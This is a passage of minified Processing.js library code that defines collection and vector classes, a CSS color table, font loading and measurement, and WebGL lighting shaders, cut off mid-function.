T(W,X,Y){this.clear=function(){M.clear()};this.contains=function(Z){return X(Z)};this.containsAll=function(aa){var Z=aa.iterator();while(Z.hasNext()){if(!this.contains(Z.next())){return false}}return true};this.isEmpty=function(){return M.isEmpty()};this.iterator=function(){return new N(W,Y)};this.remove=function(Z){if(this.contains(Z)){Y(Z);return true}return false};this.removeAll=function(ac){var Z=ac.iterator();var ab=false;while(Z.hasNext()){var aa=Z.next();if(this.contains(aa)){Y(aa);ab=true}}return true};this.retainAll=function(ad){var ab=this.iterator();var aa=[];while(ab.hasNext()){var ac=ab.next();if(!ad.contains(ac)){aa.push(ac)}}for(var Z=0;Z<aa.length;++Z){Y(aa[Z])}return aa.length>0};this.size=function(){return M.size()};this.toArray=function(){var Z=[];var aa=this.iterator();while(aa.hasNext()){Z.push(aa.next())}return Z}}function R(W){this._isIn=function(X){return X===M&&W.removed===r};this.equals=function(X){return p(W.key,X.getKey())};this.getKey=function(){return W.key};this.getValue=function(){return W.value};this.hashCode=function(X){return h(W.key)};this.setValue=function(Y){var X=W.value;W.value=Y;return X}}this.clear=function(){Q=0;O=[];O.length=U};this.clone=function(){var W=new L;W.putAll(this);return W};this.containsKey=function(Y){var W=S(Y);var Z=O[W];if(Z===r){return false}for(var X=0;X<Z.length;++X){if(p(Z[X].key,Y)){return true}}return false};this.containsValue=function(Y){for(var X=0;X<O.length;++X){var Z=O[X];if(Z===r){continue}for(var W=0;W<Z.length;++W){if(p(Z[W].value,Y)){return true}}}return false};this.entrySet=function(){return new T(function(W){return new R(W)},function(W){return W instanceof R&&W._isIn(M)},function(W){return M.remove(W.getKey())})};this.get=function(Y){var W=S(Y);var Z=O[W];if(Z===r){return null}for(var X=0;X<Z.length;++X){if(p(Z[X].key,Y)){return Z[X].value}}return null};this.isEmpty=function(){return Q===0};this.keySet=function(){return new T(function(W){return W.key},function(W){return M.containsKey(W)},function(W){return M.remove(W)})};this.values=function(){return new T(function(W){return W.value},function(W){return M.containsValue(W)},function(W){return M.removeByValue(W)})};this.put=function(Y,aa){var W=S(Y);var ab=O[W];if(ab===r){++Q;O[W]=[{key:Y,value:aa}];P();return null}for(var X=0;X<ab.length;++X){if(p(ab[X].key,Y)){var Z=ab[X].value;ab[X].value=aa;return Z}}++Q;ab.push({key:Y,value:aa});P();return null};this.putAll=function(W){var X=W.entrySet().iterator();while(X.hasNext()){var Y=X.next();this.put(Y.getKey(),Y.getValue())}};this.remove=function(Y){var W=S(Y);var aa=O[W];if(aa===r){return null}for(var X=0;X<aa.length;++X){if(p(aa[X].key,Y)){--Q;var Z=aa[X].value;aa[X].removed=true;if(aa.length>1){aa.splice(X,1)}else{O[W]=r}return Z}}return null};this.removeByValue=function(Y){var aa,X,W,Z;for(aa in O){if(O.hasOwnProperty(aa)){for(X=0,W=O[aa].length;X<W;X++){Z=O[aa][X];if(Z.value===Y){O[aa].splice(X,1);return true}}}}return false};this.size=function(){return Q}}return L}();var y=function(){function L(O,Q,P){this.x=O||0;this.y=Q||0;this.z=P||0}L.dist=function(P,O){return P.dist(O)};L.dot=function(P,O){return P.dot(O)};L.cross=function(P,O){return P.cross(O)};L.angleBetween=function(P,O){return o.acos(P.dot(O)/(P.mag()*O.mag()))};L.prototype={set:function(O,Q,P){if(arguments.length===1){this.set(O.x||O[0]||0,O.y||O[1]||0,O.z||O[2]||0)}else{this.x=O;this.y=Q;this.z=P}},get:function(){return new L(this.x,this.y,this.z)},mag:function(){var O=this.x,Q=this.y,P=this.z;return o.sqrt(O*O+Q*Q+P*P)},add:function(O,Q,P){if(arguments.length===1){this.x+=O.x;this.y+=O.y;this.z+=O.z}else{this.x+=O;this.y+=Q;this.z+=P}},sub:function(O,Q,P){if(arguments.length===1){this.x-=O.x;this.y-=O.y;this.z-=O.z}else{this.x-=O;this.y-=Q;this.z-=P}},mult:function(O){if(typeof O==="number"){this.x*=O;this.y*=O;this.z*=O}else{this.x*=O.x;this.y*=O.y;this.z*=O.z}},div:function(O){if(typeof O==="number"){this.x/=O;this.y/=O;this.z/=O}else{this.x/=O.x;this.y/=O.y;this.z/=O.z}},dist:function(R){var Q=this.x-R.x,P=this.y-R.y,O=this.z-R.z;return o.sqrt(Q*Q+P*P+O*O)},dot:function(O,Q,P){if(arguments.length===1){return this.x*O.x+this.y*O.y+this.z*O.z}return this.x*O+this.y*Q+this.z*P},cross:function(P){var O=this.x,R=this.y,Q=this.z;return new L(R*P.z-P.y*Q,Q*P.x-P.z*O,O*P.y-P.x*R)},normalize:function(){var O=this.mag();if(O>0){this.div(O)}},limit:function(O){if(this.mag()>O){this.normalize();this.mult(O)}},heading2D:function(){return -o.atan2(-this.y,this.x)},toString:function(){return"["+this.x+", "+this.y+", "+this.z+"]"},array:function(){return[this.x,this.y,this.z]}};function M(O){return function(R,Q){var P=R.get();P[O](Q);return P}}for(var N in L.prototype){if(L.prototype.hasOwnProperty(N)&&!L.hasOwnProperty(N)){L[N]=M(N)}}return L}();function K(){}K.prototype=z;var g=new K;g.ArrayList=f;g.HashMap=v;g.PVector=y;g.ObjectIterator=m;g.PConstants=z;g.defineProperty=function(M,L,N){if("defineProperty" in Object){Object.defineProperty(M,L,N)}else{if(N.hasOwnProperty("get")){M.__defineGetter__(L,N.get)}if(N.hasOwnProperty("set")){M.__defineSetter__(L,N.set)}}};function i(O,N){function P(Q){g.defineProperty(O,Q,{get:function(){return N[Q]},set:function(R){N[Q]=R},enumerable:true})}var M=[];for(var L in N){if(typeof N[L]==="function"){if(!O.hasOwnProperty(L)){O[L]=N[L]}}else{if(L.charAt(0)!=="$"&&!(L in O)){M.push(L)}}}while(M.length>0){P(M.shift())}}g.extendClassChain=function(M){var N=[M];for(var L=M.$upcast;L;L=L.$upcast){i(L,M);N.push(L);M=L}while(N.length>0){N.pop().$self=M}};g.extendStaticMembers=function(L,M){i(L,M)};g.extendInterfaceMembers=function(L,M){i(L,M)};g.addMethod=function(O,N,Q,P){if(O[N]){var M=Q.length,L=O[N];O[N]=function(){if(arguments.length===M){return Q.apply(this,arguments)}return L.apply(this,arguments)}}else{O[N]=Q}};g.createJavaArray=function(P,Q){var M=null;if(typeof Q[0]==="number"){var L=0|Q[0];if(Q.length<=1){M=[];M.length=L;for(var O=0;O<L;++O){M[O]=0}}else{M=[];var R=Q.slice(1);for(var N=0;N<L;++N){M.push(g.createJavaArray(P,R))}}}return M};var C={aliceblue:"#f0f8ff",antiquewhite:"#faebd7",aqua:"#00ffff",aquamarine:"#7fffd4",azure:"#f0ffff",beige:"#f5f5dc",bisque:"#ffe4c4",black:"#000000",blanchedalmond:"#ffebcd",blue:"#0000ff",blueviolet:"#8a2be2",brown:"#a52a2a",burlywood:"#deb887",cadetblue:"#5f9ea0",chartreuse:"#7fff00",chocolate:"#d2691e",coral:"#ff7f50",cornflowerblue:"#6495ed",cornsilk:"#fff8dc",crimson:"#dc143c",cyan:"#00ffff",darkblue:"#00008b",darkcyan:"#008b8b",darkgoldenrod:"#b8860b",darkgray:"#a9a9a9",darkgreen:"#006400",darkkhaki:"#bdb76b",darkmagenta:"#8b008b",darkolivegreen:"#556b2f",darkorange:"#ff8c00",darkorchid:"#9932cc",darkred:"#8b0000",darksalmon:"#e9967a",darkseagreen:"#8fbc8f",darkslateblue:"#483d8b",darkslategray:"#2f4f4f",darkturquoise:"#00ced1",darkviolet:"#9400d3",deeppink:"#ff1493",deepskyblue:"#00bfff",dimgray:"#696969",dodgerblue:"#1e90ff",firebrick:"#b22222",floralwhite:"#fffaf0",forestgreen:"#228b22",fuchsia:"#ff00ff",gainsboro:"#dcdcdc",ghostwhite:"#f8f8ff",gold:"#ffd700",goldenrod:"#daa520",gray:"#808080",green:"#008000",greenyellow:"#adff2f",honeydew:"#f0fff0",hotpink:"#ff69b4",indianred:"#cd5c5c",indigo:"#4b0082",ivory:"#fffff0",khaki:"#f0e68c",lavender:"#e6e6fa",lavenderblush:"#fff0f5",lawngreen:"#7cfc00",lemonchiffon:"#fffacd",lightblue:"#add8e6",lightcoral:"#f08080",lightcyan:"#e0ffff",lightgoldenrodyellow:"#fafad2",lightgrey:"#d3d3d3",lightgreen:"#90ee90",lightpink:"#ffb6c1",lightsalmon:"#ffa07a",lightseagreen:"#20b2aa",lightskyblue:"#87cefa",lightslategray:"#778899",lightsteelblue:"#b0c4de",lightyellow:"#ffffe0",lime:"#00ff00",limegreen:"#32cd32",linen:"#faf0e6",magenta:"#ff00ff",maroon:"#800000",mediumaquamarine:"#66cdaa",mediumblue:"#0000cd",mediumorchid:"#ba55d3",mediumpurple:"#9370d8",mediumseagreen:"#3cb371",mediumslateblue:"#7b68ee",mediumspringgreen:"#00fa9a",mediumturquoise:"#48d1cc",mediumvioletred:"#c71585",midnightblue:"#191970",mintcream:"#f5fffa",mistyrose:"#ffe4e1",moccasin:"#ffe4b5",navajowhite:"#ffdead",navy:"#000080",oldlace:"#fdf5e6",olive:"#808000",olivedrab:"#6b8e23",orange:"#ffa500",orangered:"#ff4500",orchid:"#da70d6",palegoldenrod:"#eee8aa",palegreen:"#98fb98",paleturquoise:"#afeeee",palevioletred:"#d87093",papayawhip:"#ffefd5",peachpuff:"#ffdab9",peru:"#cd853f",pink:"#ffc0cb",plum:"#dda0dd",powderblue:"#b0e0e6",purple:"#800080",red:"#ff0000",rosybrown:"#bc8f8f",royalblue:"#4169e1",saddlebrown:"#8b4513",salmon:"#fa8072",sandybrown:"#f4a460",seagreen:"#2e8b57",seashell:"#fff5ee",sienna:"#a0522d",silver:"#c0c0c0",skyblue:"#87ceeb",slateblue:"#6a5acd",slategray:"#708090",snow:"#fffafa",springgreen:"#00ff7f",steelblue:"#4682b4",tan:"#d2b48c",teal:"#008080",thistle:"#d8bfd8",tomato:"#ff6347",turquoise:"#40e0d0",violet:"#ee82ee",wheat:"#f5deb3",white:"#ffffff",whitesmoke:"#f5f5f5",yellow:"#ffff00",yellowgreen:"#9acd32"};(function(M){var P=("open() createOutput() createInput() BufferedReader selectFolder() dataPath() createWriter() selectOutput() beginRecord() saveStream() endRecord() selectInput() saveBytes() createReader() beginRaw() endRaw() PrintWriter delay()").split(" "),O=P.length,L,Q;function N(R){return function(){throw"Processing.js does not support "+R+"."}}while(O--){L=P[O];Q=L.replace("()","");M[Q]=N(L)}})(g);g.defineProperty(g,"screenWidth",{get:function(){return B.innerWidth}});g.defineProperty(g,"screenHeight",{get:function(){return B.innerHeight}});var k=[];var H={};var J=function(L){k.splice(H[L],1);delete H[L]};var a=function(L){if(L.externals.canvas.id===r||!L.externals.canvas.id.length){L.externals.canvas.id="__processing"+k.length}H[L.externals.canvas.id]=k.length;k.push(L)};function n(V){var O=250,ac=V.size/O,L=d.createElement("canvas");L.width=2*O;L.height=2*O;L.style.opacity=0;var U=V.getCSSDefinition(O+"px","normal"),W=L.getContext("2d");W.font=U;V.context2d=W;var aa="dbflkhyjqpg";L.width=W.measureText(aa).width;W.font=U;var R=d.createElement("div");R.style.position="absolute";R.style.opacity=0;R.style.fontFamily='"'+V.name+'"';R.style.fontSize=O+"px";R.innerHTML=aa+"<br/>"+aa;d.body.appendChild(R);var S=L.width,Z=L.height,T=Z/2;W.fillStyle="white";W.fillRect(0,0,S,Z);W.fillStyle="black";W.fillText(aa,0,T);var N=W.getImageData(0,0,S,Z).data;var X=0,Q=S*4,Y=N.length;while(++X<Y&&N[X]===255){E()}var P=o.round(X/Q);X=Y-1;while(--X>0&&N[X]===255){E()}var ab=o.round(X/Q);V.ascent=ac*(T-P);V.descent=ac*(ab-T);if(d.defaultView.getComputedStyle){var M=d.defaultView.getComputedStyle(R,null).getPropertyValue("height");M=ac*M.replace("px","");if(M>=V.size*2){V.leading=o.round(M/2)}}d.body.removeChild(R)}function F(L,M){if(L===r){L=""}this.name=L;if(M===r){M=0}this.size=M;this.glyph=false;this.ascent=0;this.descent=0;this.leading=1.2*M;var P=L.indexOf(" Italic Bold");if(P!==-1){L=L.substring(0,P)}this.style="normal";var O=L.indexOf(" Italic");if(O!==-1){L=L.substring(0,O);this.style="italic"}this.weight="normal";var N=L.indexOf(" Bold");if(N!==-1){L=L.substring(0,N);this.weight="bold"}this.family="sans-serif";if(L!==r){switch(L){case"sans-serif":case"serif":case"monospace":case"fantasy":case"cursive":this.family=L;break;default:this.family='"'+L+'", sans-serif';break}}this.context2d=null;n(this);this.css=this.getCSSDefinition();this.context2d.font=this.css}F.prototype.getCSSDefinition=function(N,L){if(N===r){N=this.size+"px"}if(L===r){L=this.leading+"px"}var M=[this.style,"normal",this.weight,N+"/"+L,this.family];return M.join(" ")};F.prototype.measureTextWidth=function(L){return this.context2d.measureText(L).width};F.PFontCache={};F.get=function(N,O){var M=F.PFontCache;var L=N+"/"+O;if(!M[L]){M[L]=new F(N,O)}return M[L]};F.list=function(){return["sans-serif","serif","monospace","fantasy","cursive"]};F.preloading={template:{},initialized:false,initialize:function(){var N=function(){var P="#E3KAI2wAgT1MvMg7Eo3VmNtYX7ABi3CxnbHlm7Abw3kaGVhZ7ACs3OGhoZWE7A53CRobXR47AY3AGbG9jYQ7G03Bm1heH7ABC3CBuYW1l7Ae3AgcG9zd7AI3AE#B3AQ2kgTY18PPPUACwAg3ALSRoo3#yld0xg32QAB77#E777773B#E3C#I#Q77773E#Q7777777772CMAIw7AB77732B#M#Q3wAB#g3B#E#E2BB//82BB////w#B7#gAEg3E77x2B32B#E#Q#MTcBAQ32gAe#M#QQJ#E32M#QQJ#I#g32Q77#";var O=function(Q){return"AAAAAAAA".substr(~~Q?7-Q:6)};return P.replace(/[#237]/g,O)};var L=d.createElement("style");L.setAttribute("type","text/css");L.innerHTML='@font-face {\n font-family: "PjsEmptyFont";\n src: url(\'data:application/x-font-ttf;base64,'+N()+"')\n format('truetype');\n}";d.head.appendChild(L);var M=d.createElement("span");M.style.cssText='position: absolute; top: 0; left: 0; opacity: 0; font-family: "PjsEmptyFont", fantasy;';M.innerHTML="AAAAAAAA";d.body.appendChild(M);this.template=M;this.initialized=true},getElementWidth:function(L){return d.defaultView.getComputedStyle(L,"").getPropertyValue("width")},timeAttempted:0,pending:function(P){if(!this.initialized){this.initialize()}var N,L,O=this.getElementWidth(this.template);for(var M=0;M<this.fontList.length;M++){N=this.fontList[M];L=this.getElementWidth(N);if(this.timeAttempted<4000&&L===O){this.timeAttempted+=P;return true}else{d.body.removeChild(N);this.fontList.splice(M--,1);this.timeAttempted=0}}if(this.fontList.length===0){return false}return true},fontList:[],addedList:{},add:function(L){if(!this.initialized){this.initialize()}var P=typeof L==="object"?L.fontFace:L,O=typeof L==="object"?L.url:L;if(this.addedList[P]){return}var N=d.createElement("style");N.setAttribute("type","text/css");N.innerHTML="@font-face{\n font-family: '"+P+"';\n src: url('"+O+"');\n}\n";d.head.appendChild(N);this.addedList[P]=true;var M=d.createElement("span");M.style.cssText="position: absolute; top: 0; left: 0; opacity: 0;";M.style.fontFamily='"'+P+'", "PjsEmptyFont", fantasy';M.innerHTML="AAAAAAAA";d.body.appendChild(M);this.fontList.push(M)}};g.PFont=F;var D=this.Processing=function(ba,a6){if(!(this instanceof D)){throw"called Processing constructor as if it were a function: missing 'new'."}var ac,cU=ba===r&&a6===r;if(cU){ac=d.createElement("canvas")}else{ac=typeof ba==="string"?d.getElementById(ba):ba}if(!(ac instanceof HTMLCanvasElement)){throw"called Processing constructor without passing canvas element reference or id."}function dt(d7){D.debug("Unimplemented - "+d7)}var cV=this;cV.externals={canvas:ac,context:r,sketch:r};cV.name="Processing.js Instance";cV.use3DContext=false;cV.focused=false;cV.breakShape=false;cV.glyphTable={};cV.pmouseX=0;cV.pmouseY=0;cV.mouseX=0;cV.mouseY=0;cV.mouseButton=0;cV.mouseScroll=0;cV.mouseClicked=r;cV.mouseDragged=r;cV.mouseMoved=r;cV.mousePressed=r;cV.mouseReleased=r;cV.mouseScrolled=r;cV.mouseOver=r;cV.mouseOut=r;cV.touchStart=r;cV.touchEnd=r;cV.touchMove=r;cV.touchCancel=r;cV.key=r;cV.keyCode=r;cV.keyPressed=E;cV.keyReleased=E;cV.keyTyped=E;cV.draw=r;cV.setup=r;cV.__mousePressed=false;cV.__keyPressed=false;cV.__frameRate=60;cV.frameCount=0;cV.width=100;cV.height=100;var d4,cP,dU,bA=true,aF=true,bl=[1,1,1,1],aX=4294967295,ap=true,cd=true,cZ=[0,0,0,1],cu=4278190080,b2=true,dS=1,aw=false,dK=false,aB=true,b3=0,bI=0,cM=3,a4=0,a3=0,a2=0,aY=0,dQ=60,ay=1000/dQ,X="default",cj=ac.style.cursor,dN=20,ci=0,d2=[],aH=0,O=20,cL=false,a0=-3355444,cx=20,bR=255,bG=255,bF=255,bD=255,cY=false,aI=false,dJ=0,d1=0,cX=1,bb=null,bt=null,a1=false,dm=Date.now(),dq=dm,N=0,cD,c2,aN,aJ,bw,cc,S,dz={attributes:{},locations:{}},du,dM,bQ,bd,cI,di,aA,b1,bc,b7,ar,aE,bz,av,ae,c6,bP,cr={width:0,height:0},d0=2,dP=false,cG,aa,P,L=37,c0=0,cH=4,W="Arial",dW=12,aZ=9,dx=2,d3=14,U=F.get(W,dW),ai,cm=null,dR=false,dZ,bY=1000,af=[],dE=null,dT=[16,17,18,20,33,34,35,36,37,38,39,40,144,155,112,113,114,115,116,117,118,119,120,121,122,123,157];var ab,dl,aR,bV;if(d.defaultView&&d.defaultView.getComputedStyle){ab=parseInt(d.defaultView.getComputedStyle(ac,null)["paddingLeft"],10)||0;dl=parseInt(d.defaultView.getComputedStyle(ac,null)["paddingTop"],10)||0;aR=parseInt(d.defaultView.getComputedStyle(ac,null)["borderLeftWidth"],10)||0;bV=parseInt(d.defaultView.getComputedStyle(ac,null)["borderTopWidth"],10)||0}var dH=0;var bJ=0,bK=0,bq=[],bp=[],bo=[],ag=new e(720),bi=new e(720),cE,cz;var bT,cg,dF,aQ,al,c9,Z,da,ao=false,ch=false,cJ=60*(o.PI/180),dj=cV.width/2,dh=cV.height/2,dg=dh/o.tan(cJ/2),aW=dg/10,au=dg*10,b4=cV.width/cV.height;var a7=[],ca=[],c1=0,dL=false,Y=false,dr=true;var Q=0;var bj=[];var df=new e([0.5,0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,0.5,0.5,0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,0.5,0.5,0.5]);var bE=new e([0.5,0.5,0.5,0.5,-0.5,0.5,0.5,0.5,-0.5,0.5,-0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5,0.5,0.5,0.5,0.5,0.5,-0.5,0.5,0.5,-0.5,-0.5,0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,-0.5,0.5,-0.5,-0.5,0.5,0.5,-0.5,0.5]);var de=new e([0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,-1,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0]);var aj=new e([0,0,0,0,1,0,1,1,0,1,0,0]);var ah=new e([0,0,1,0,0,1,0,0,1,0,0,1]);var bS="varying vec4 frontColor;attribute vec3 aVertex;attribute vec4 aColor;uniform mat4 uView;uniform mat4 uProjection;uniform float pointSize;void main(void) { frontColor = aColor; gl_PointSize = pointSize; gl_Position = uProjection * uView * vec4(aVertex, 1.0);}";var bf="#ifdef GL_ES\nprecision highp float;\n#endif\nvarying vec4 frontColor;void main(void){ gl_FragColor = frontColor;}";var ad="varying vec4 frontColor;attribute vec3 Vertex;attribute vec2 aTextureCoord;uniform vec4 color;uniform mat4 model;uniform mat4 view;uniform mat4 projection;uniform float pointSize;varying vec2 vTextureCoord;void main(void) { gl_PointSize = pointSize; frontColor = color; gl_Position = projection * view * model * vec4(Vertex, 1.0); vTextureCoord = aTextureCoord;}";var bX="#ifdef GL_ES\nprecision highp float;\n#endif\nvarying vec4 frontColor;varying vec2 vTextureCoord;uniform sampler2D uSampler;uniform int picktype;void main(void){ if(picktype == 0){ gl_FragColor = frontColor; } else if(picktype == 1){ float alpha = texture2D(uSampler, vTextureCoord).a; gl_FragColor = vec4(frontColor.rgb*alpha, alpha);\n }}";var bx=/Windows/.test(navigator.userAgent);var d5="varying vec4 frontColor;attribute vec3 Vertex;attribute vec3 Normal;attribute vec4 aColor;attribute vec2 aTexture;varying vec2 vTexture;uniform vec4 color;uniform bool usingMat;uniform vec3 specular;uniform vec3 mat_emissive;uniform vec3 mat_ambient;uniform vec3 mat_specular;uniform float shininess;uniform mat4 model;uniform mat4 view;uniform mat4 projection;uniform mat4 normalTransform;uniform int lightCount;uniform vec3 falloff;struct Light { int type; vec3 color; vec3 position; vec3 direction; float angle; vec3 halfVector; float concentration;};uniform Light lights0;uniform Light lights1;uniform Light lights2;uniform Light lights3;uniform Light lights4;uniform Light lights5;uniform Light lights6;uniform Light lights7;Light getLight(int index){ if(index == 0) return lights0; if(index == 1) return lights1; if(index == 2) return lights2; if(index == 3) return lights3; if(index == 4) return lights4; if(index == 5) return lights5; if(index == 6) return lights6; return lights7;}void AmbientLight( inout vec3 totalAmbient, in vec3 ecPos, in Light light ) { float d = length( light.position - ecPos ); float attenuation = 1.0 / ( falloff[0] + ( falloff[1] * d ) + ( falloff[2] * d * d )); totalAmbient += light.color * attenuation;}void DirectionalLight( inout vec3 col, inout vec3 spec, in vec3 vertNormal, in vec3 ecPos, in Light light ) { float powerfactor = 0.0; float nDotVP = max(0.0, dot( vertNormal, normalize(-light.position) )); float nDotVH = max(0.0, dot( vertNormal, normalize(-light.position-normalize(ecPos) ))); if( nDotVP != 0.0 ){ powerfactor = pow( nDotVH, shininess ); } col += light.color * nDotVP; spec += specular * powerfactor;}void PointLight( inout vec3 col, inout vec3 spec, in vec3 vertNormal, in vec3 ecPos, in Light light ) { float powerfactor; vec3 VP = light.position - ecPos; float d = length( VP ); VP = normalize( VP ); float attenuation = 1.0 / ( falloff[0] + ( falloff[1] * d ) + ( falloff[2] * d * d )); float nDotVP = max( 0.0, dot( vertNormal, VP )); vec3 halfVector = normalize( VP - normalize(ecPos) ); float nDotHV = max( 0.0, dot( vertNormal, halfVector )); if( nDotVP == 0.0) { powerfactor = 0.0; } else{ powerfactor = pow( nDotHV, shininess ); } spec += specular * powerfactor * attenuation; col += light.color * nDotVP * attenuation;}void SpotLight( inout vec3 col, inout vec3 spec, in vec3 vertNormal, in vec3 ecPos, in Light light ) { float spotAttenuation; float powerfactor; vec3 VP = light.position - ecPos; vec3 ldir = normalize( -light.direction ); float d = length( VP ); VP = normalize( VP ); float attenuation = 1.0 / ( falloff[0] + ( falloff[1] * d ) + ( falloff[2] * d * d ) ); float spotDot = dot( VP, ldir );"+(bx?" spotAttenuation = 1.0; ":" if( spotDot > cos( light.angle ) ) { spotAttenuation = pow( spotDot, light.concentration ); } else{ spotAttenuation = 0.0; } attenuation *= spotAttenuation;")+" float nDotVP = max( 0.0, dot( vertNormal, VP )); vec3 halfVector = normalize( VP - normalize(ecPos) ); float nDotHV = max( 0.0, dot( vertNormal, halfVector )); if( nDotVP == 0.0 ) { powerfactor = 0.0; } else { powerfactor = pow( nDotHV, shininess ); } spec += specular * powerfactor * attenuation; col += light.color * nDotVP * attenuation;}void main(void) { vec3 finalAmbient = vec3( 0.0, 0.0, 0.0 ); vec3 finalDiffuse = vec3( 0.0, 0.0, 0.0 ); vec3 finalSpecular = vec3( 0.0, 0.0, 0.0 ); vec4 col = color; if(color[0] == -1.0){ col = aColor; } vec3 norm = normalize(vec3( normalTransform * vec4( Normal, 0.0 ) )); vec4 ecPos4 = view * model * vec4(Vertex,1.0); vec3 ecPos = (vec3(ecPos4))/ecPos4.w; if( lightCount == 0 ) { frontColor = col + vec4(mat_specular,1.0); } else { for( int i = 0; i < 8; i++ ) { Light l = getLight(i); if( i >= lightCount ){ break; } if( l.type == 0 ) { AmbientLight( finalAmbient, ecPos, l ); } else if( l.type == 1 ) { DirectionalLight( finalDiffuse, finalSpecular, norm, ecPos, l ); } else if( l.type == 2 ) { PointLight( finalDiffuse, finalSpecular, norm, ecPos, l ); } else { SpotLight( finalDiffuse, finalSpecular, norm, ecPos, l ); } } if( usingMat == false ) { frontColor = vec4( vec3(col) * finalAmbient + vec3(col) * finalDiffuse + vec3(col) * finalSpecular, col[3] ); } else{ frontColor = vec4( mat_emissive + (vec3(col) * mat_ambient * finalAmbient) + (vec3(col) * finalDiffuse) + (mat_specular * finalSpecular), col[3] ); } } vTexture.xy = aTexture.xy; gl_Position = projection * view * model * vec4( Vertex, 1.0 );}";var bH="#ifdef GL_ES\nprecision highp float;\n#endif\nvarying vec4 frontColor;uniform sampler2D sampler;uniform bool usingTexture;varying vec2 vTexture;void main(void){ if(usingTexture){ gl_FragColor = vec4(texture2D(sampler, vTexture.xy)) * frontColor; } else{ gl_FragColor = frontColor; }}";function dY(d9,d8,eb,ea){var d7=dz.locations[d9];if(d7===r){d7=d4.getUniformLocation(d8,eb);dz.locations[d9]=d7}if(d7!==null){if(ea.length===4){d4.uniform4fv(d7,ea)}else{if(ea.length===3){d4.uniform3fv(d7,ea)}else{if(ea.length===2){d4.uniform2fv(d7,ea)}else{d4.uniform1f(d7,ea)}}}}}function dV(d9,d8,eb,ea){var d7=dz.locations[d9];if(d7===r){d7=d4.getUniformLocation(d8,eb);dz.locations[d9]=d7}if(d7!==null){if(ea.length===4){d4.uniform4iv(d7,ea)}else{if(ea.length===3){d4.uniform3iv(d7,ea)}else{if(ea.length===2){d4.uniform2iv(d7,ea)}else{d4.uniform1i(d7,ea)}}}}}function a5(eb,d9,ec,ea,d8){var d7=dz.locations[eb];if(d7===r){d7=d4.getUniformLocation(d9,ec);dz.locations[eb]=d7}if(d7!==-1){if(d8.length===16){d4.uniformMatrix4fv(d7,ea,d8)}else{if(d8.length===9){d4.uniformMatrix3fv(d7,ea,d8)}else{d4.uniformMatrix2fv(d7,ea,d8)}}}}function db(eb,d9,ec,d8,ea){var d7=dz.attributes[eb];if(d7===r){d7=d4.getAttribLocation(d9,ec);dz.attributes[eb]=d7}if(d7!==-1){d4.bindBuffer(d4.ARRAY_BUFFER,ea);d4.vertexAttribPointer(d7,d8,d4.FLOAT,false,0,0);d4.enableVertexAttribArray(d7)}}function cf(d9,d8,ea){var d7=dz.attributes[d9];if(d7===r){d7=d4.getAttribLocation(d8,ea);dz.attributes[d9]=d7}if(d7!==-1){d4.disableVertexAttribArray(d7)}}var bC=function(d9,eb,d8){var ec=d9.createShader(d9.VERTEX_SHADER);d9.shaderSource(ec,eb);d9.compileShader(ec);if(!d9.getShaderParameter(ec,d9.COMPILE_STATUS)){throw d9.getShaderInfoLog(ec)}var ea=d9.createShader(d9.FRAGMENT_SHADER);d9.shaderSource(ea,d8);d9.compileShader(ea);if(!d9.getShaderParameter(ea,d9.COMPILE_STATUS)){throw d9.getShaderInfoLog(ea)}var d7=d9.createProgram();d9.attachShader(d7,ec);d9.attachShader(d7,ea);d9.linkProgram(d7);if(!d9.getProgramParameter(d7,d9.LINK_STATUS)){throw"Error linking shaders."}return d7};var aV=function(d7,eb,d8,ea,d9){return{x:d7,y:eb,w:d8,h:ea}};var bh=aV;var b0=function(d7,eb,d8,ea,d9){return{x:d7,y:eb,w:d9?d8:d8-d7,h:d9?ea:ea-eb}};var aL=function(d7,eb,d8,ea,d9){return{x:d7-d8/2,y:eb-ea/2,w:d8,h:ea}};var dp=function(){};var bO=function(){};var by=function(){};var b9=function(){};bO.prototype=new dp;bO.prototype.constructor=bO;by.prototype=new dp;by.prototype.constructor=by;b9.prototype=new dp;b9.prototype.constructor=b9;dp.prototype.a3DOnlyFunction=E;var ck={};var bN=cV.Character=function(d7){if(typeof d7==="string"&&d7.length===1){this.code=d7.charCodeAt(0)}else{if(typeof d7==="number"){this.code=d7}else{if(d7 instanceof bN){this.code=d7}else{this.code=NaN}}}return ck[this.code]===r?ck[this.code]=this:ck[this.code]};bN.prototype.toString=function(){return String.fromCharCode(this.code)};bN.prototype.valueOf=function(){return this.code};var M=cV.PShape=function(d7){this.family=d7||0;this.visible=true;this.style=true;this.children=[];this.nameTable=[];this.params=[];this.name="";this.image=null;this.matrix=null;this.kind=null;this.close=null;this.width=null;this.height=null;this.parent=null};M.prototype={isVisible:function(){return this.visible},setVisible:function(d7){this.visible=d7},disableStyle:function(){this.style=false;for(var d8=0,d7=this.children.length;d8<d7;d8++){this.children[d8].disableStyle()}},enableStyle:function(){this.style=true;for(var 